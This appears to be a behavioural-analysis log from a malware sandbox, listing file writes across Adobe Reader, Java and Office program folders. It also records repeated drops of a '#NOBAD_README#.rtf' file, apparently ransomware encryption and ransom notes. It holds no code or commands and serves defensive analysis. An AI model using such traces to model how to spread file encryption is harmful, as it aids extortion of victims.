| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 32768 |
|
1 | |
| Write | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\-Gi-.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#NOBAD_README#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#NOBAD_README#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | size = 2696 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\tnameserv.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\tnameserv.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | size = 2460 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | size = 2048 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | size = 7765 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | size = 4639 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#NOBAD_README#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#NOBAD_README#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | size = 9221 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ko.properties | size = 7128 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | size = 2877 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | size = 3542 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | size = 3882 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\release | size = 1944 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | size = 1823 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | size = 1581 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | size = 1797 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | size = 4792 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | size = 2669 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\LICENSE | size = 1456 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | size = 5470 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | size = 6598 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp | size = 1785 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp | size = 1764 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | size = 2050 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | size = 5538 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\README.txt | size = 1462 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\#NOBAD_README#.rtf | size = 3143 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\tzmappings | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\tzmappings | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | size = 5488 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | size = 3871 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | size = 6142 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | size = 1853 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp | size = 2001 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | size = 4442 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | size = 1798 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | size = 1584 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | size = 1848 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | size = 5880 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#NOBAD_README#.rtf | size = 1522 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\calendars.properties | size = 2794 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | size = 4276 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#NOBAD_README#.rtf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#NOBAD_README#.rtf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 61440 |
|
4 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | size = 5344 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | size = 4096 |
|
1 | |
